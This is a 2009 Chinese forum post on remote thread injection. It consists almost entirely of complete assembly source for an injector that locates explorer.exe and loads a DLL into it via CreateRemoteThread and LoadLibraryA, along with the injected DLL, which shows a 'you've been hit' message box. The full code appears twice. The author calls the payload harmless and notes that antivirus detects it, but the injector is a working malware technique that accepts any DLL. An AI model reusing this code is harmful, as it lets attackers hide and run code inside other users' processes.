-
-
[旧帖] [原创]远程线程注入(申请邀请码) 0.00雪花
-
发表于: 2009-11-26 11:55
-
在系统中找到一个正在运行的程序,向此程序中添加代码!
此例在explorer.exe添加代码!!
添加的代码只是显示了一个对话框而已,没有任何破坏性!!!
生成的 进程.exe只起到注入的作用!!
注意:杀毒软件会查杀!!!
.asm
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hProcess dd ?
dwThreadID dd ?
dwProcessID dd ?
lpLoadLibrary dd ?
lpDllName dd ?
szMyDllFull db MAX_PATH dup (?)
stProcess PROCESSENTRY32 <?>
hSnapShot dd ?
.const
szErrOpen db '无法打开远程线程',0
szDesktopExe db 'explorer.exe',0
szDllKernel db 'Kernel32.dll',0
szLoadLibrary db 'LoadLibraryA',0
szMyDll db '\zhudong.dll',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
start:
invoke GetCurrentDirectory,MAX_PATH,addr szMyDllFull
invoke lstrcat,addr szMyDllFull,addr szMyDll
invoke GetModuleHandle,addr szDllKernel
invoke GetProcAddress,eax,addr szLoadLibrary
mov lpLoadLibrary,eax
invoke RtlZeroMemory,addr stProcess,sizeof stProcess
mov stProcess.dwSize,sizeof stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov hSnapShot,eax
invoke Process32First,hSnapShot,addr stProcess
@@:invoke lstrcmpi,addr stProcess.szExeFile,addr szDesktopExe
.if !eax
mov eax,stProcess.th32ProcessID
.else
invoke Process32Next,hSnapShot,addr stProcess
jmp @B
.endif
mov dwThreadID,eax
mov dwProcessID,eax
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_VM_READ or PROCESS_TERMINATE,\
FALSE,dwProcessID
.if eax
mov hProcess,eax
invoke VirtualAllocEx,hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE
.if eax
mov lpDllName,eax
invoke WriteProcessMemory,hProcess,eax,offset szMyDllFull,MAX_PATH,NULL
invoke CreateRemoteThread,hProcess,NULL,0,lpLoadLibrary,lpDllName,0,NULL
invoke CloseHandle,eax
.endif
invoke CloseHandle,hProcess
.else
invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING
.endif
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
.dll
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hInstance dd ?
hWinMain dd ?
.const
szClassName db 'RemoteClass',0
szCaptionMain db 'RemoteWindow',0
szText db '哈哈!你中招了!',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
_ProcWinMain proc uses ebx edi esi,hWnd,uMsg,wParam,lParam
mov eax,uMsg
.if eax == WM_CLOSE
invoke DestroyWindow,hWnd
invoke PostQuitMessage,NULL
.else
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.endif
xor eax,eax
ret
_ProcWinMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WinMain proc uses ebx esi edi _lParam
local @stWndClass:WNDCLASSEX
local @stMsg:MSG
invoke RtlZeroMemory,addr @stWndClass,sizeof @stWndClass
invoke LoadCursor,0,IDC_ARROW
mov @stWndClass.hCursor,eax
push hInstance
pop @stWndClass.hInstance
mov @stWndClass.cbSize,sizeof WNDCLASSEX
mov @stWndClass.style,CS_HREDRAW or CS_VREDRAW
mov @stWndClass.lpfnWndProc,offset _ProcWinMain
mov @stWndClass.hbrBackground,COLOR_WINDOW + 1
mov @stWndClass.lpszClassName,offset szClassName
invoke RegisterClassEx,addr @stWndClass
invoke MessageBox,NULL,addr szText,NULL,MB_OK or MB_ICONWARNING
invoke CreateWindowEx,WS_EX_CLIENTEDGE,offset szClassName,offset szCaptionMain,\
WS_OVERLAPPEDWINDOW,\
100,100,600,400,\
NULL,NULL,hInstance,NULL
mov hWinMain,eax
invoke ShowWindow,hWinMain,SW_SHOWNORMAL
invoke UpdateWindow,hWinMain
.while TRUE
invoke GetMessage,addr @stMsg,NULL,0,0
.break .if eax == 0
invoke TranslateMessage,addr @stMsg
invoke DispatchMessage,addr @stMsg
.endw
ret
_WinMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
DllEntry proc _hInstance,_dwReason,_dwReserved
local @dwThreadID
.if _dwReason == DLL_PROCESS_ATTACH
push _hInstance
pop hInstance
invoke CreateThread,NULL,0,offset _WinMain,NULL,NULL,addr @dwThreadID
invoke CloseHandle,eax
.endif
mov eax,TRUE
ret
DllEntry Endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end DllEntry
.rc
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#include <resource.h>
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#define ICO_MAIN 1000
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN ICON "Main.ico"
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
此例在explorer.exe添加代码!!
添加的代码只是显示了一个对话框而已,没有任何破坏性!!!生成的 进程.exe只起到注入的作用!!
注意:杀毒软件会查杀!!!.asm
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include kernel32.inc
include user32.inc
includelib kernel32.lib
includelib user32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hProcess dd ?
dwThreadID dd ?
dwProcessID dd ?
lpLoadLibrary dd ?
lpDllName dd ?
szMyDllFull db MAX_PATH dup (?)
stProcess PROCESSENTRY32 <?>
hSnapShot dd ?
.const
szErrOpen db '无法打开远程线程',0
szDesktopExe db 'explorer.exe',0
szDllKernel db 'Kernel32.dll',0
szLoadLibrary db 'LoadLibraryA',0
szMyDll db '\zhudong.dll',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
start:
invoke GetCurrentDirectory,MAX_PATH,addr szMyDllFull
invoke lstrcat,addr szMyDllFull,addr szMyDll
invoke GetModuleHandle,addr szDllKernel
invoke GetProcAddress,eax,addr szLoadLibrary
mov lpLoadLibrary,eax
invoke RtlZeroMemory,addr stProcess,sizeof stProcess
mov stProcess.dwSize,sizeof stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov hSnapShot,eax
invoke Process32First,hSnapShot,addr stProcess
@@:invoke lstrcmpi,addr stProcess.szExeFile,addr szDesktopExe
.if !eax
mov eax,stProcess.th32ProcessID
.else
invoke Process32Next,hSnapShot,addr stProcess
jmp @B
.endif
mov dwThreadID,eax
mov dwProcessID,eax
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_VM_READ or PROCESS_TERMINATE,\
FALSE,dwProcessID
.if eax
mov hProcess,eax
invoke VirtualAllocEx,hProcess,NULL,MAX_PATH,MEM_COMMIT,PAGE_READWRITE
.if eax
mov lpDllName,eax
invoke WriteProcessMemory,hProcess,eax,offset szMyDllFull,MAX_PATH,NULL
invoke CreateRemoteThread,hProcess,NULL,0,lpLoadLibrary,lpDllName,0,NULL
invoke CloseHandle,eax
.endif
invoke CloseHandle,hProcess
.else
invoke MessageBox,NULL,addr szErrOpen,NULL,MB_OK or MB_ICONWARNING
.endif
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
.dll
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hInstance dd ?
hWinMain dd ?
.const
szClassName db 'RemoteClass',0
szCaptionMain db 'RemoteWindow',0
szText db '哈哈!你中招了!',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
_ProcWinMain proc uses ebx edi esi,hWnd,uMsg,wParam,lParam
mov eax,uMsg
.if eax == WM_CLOSE
invoke DestroyWindow,hWnd
invoke PostQuitMessage,NULL
.else
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.endif
xor eax,eax
ret
_ProcWinMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WinMain proc uses ebx esi edi _lParam
local @stWndClass:WNDCLASSEX
local @stMsg:MSG
invoke RtlZeroMemory,addr @stWndClass,sizeof @stWndClass
invoke LoadCursor,0,IDC_ARROW
mov @stWndClass.hCursor,eax
push hInstance
pop @stWndClass.hInstance
mov @stWndClass.cbSize,sizeof WNDCLASSEX
mov @stWndClass.style,CS_HREDRAW or CS_VREDRAW
mov @stWndClass.lpfnWndProc,offset _ProcWinMain
mov @stWndClass.hbrBackground,COLOR_WINDOW + 1
mov @stWndClass.lpszClassName,offset szClassName
invoke RegisterClassEx,addr @stWndClass
invoke MessageBox,NULL,addr szText,NULL,MB_OK or MB_ICONWARNING
invoke CreateWindowEx,WS_EX_CLIENTEDGE,offset szClassName,offset szCaptionMain,\
WS_OVERLAPPEDWINDOW,\
100,100,600,400,\
NULL,NULL,hInstance,NULL
mov hWinMain,eax
invoke ShowWindow,hWinMain,SW_SHOWNORMAL
invoke UpdateWindow,hWinMain
.while TRUE
invoke GetMessage,addr @stMsg,NULL,0,0
.break .if eax == 0
invoke TranslateMessage,addr @stMsg
invoke DispatchMessage,addr @stMsg
.endw
ret
_WinMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
DllEntry proc _hInstance,_dwReason,_dwReserved
local @dwThreadID
.if _dwReason == DLL_PROCESS_ATTACH
push _hInstance
pop hInstance
invoke CreateThread,NULL,0,offset _WinMain,NULL,NULL,addr @dwThreadID
invoke CloseHandle,eax
.endif
mov eax,TRUE
ret
DllEntry Endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end DllEntry
.rc
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#include <resource.h>
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#define ICO_MAIN 1000
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN ICON "Main.ico"
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
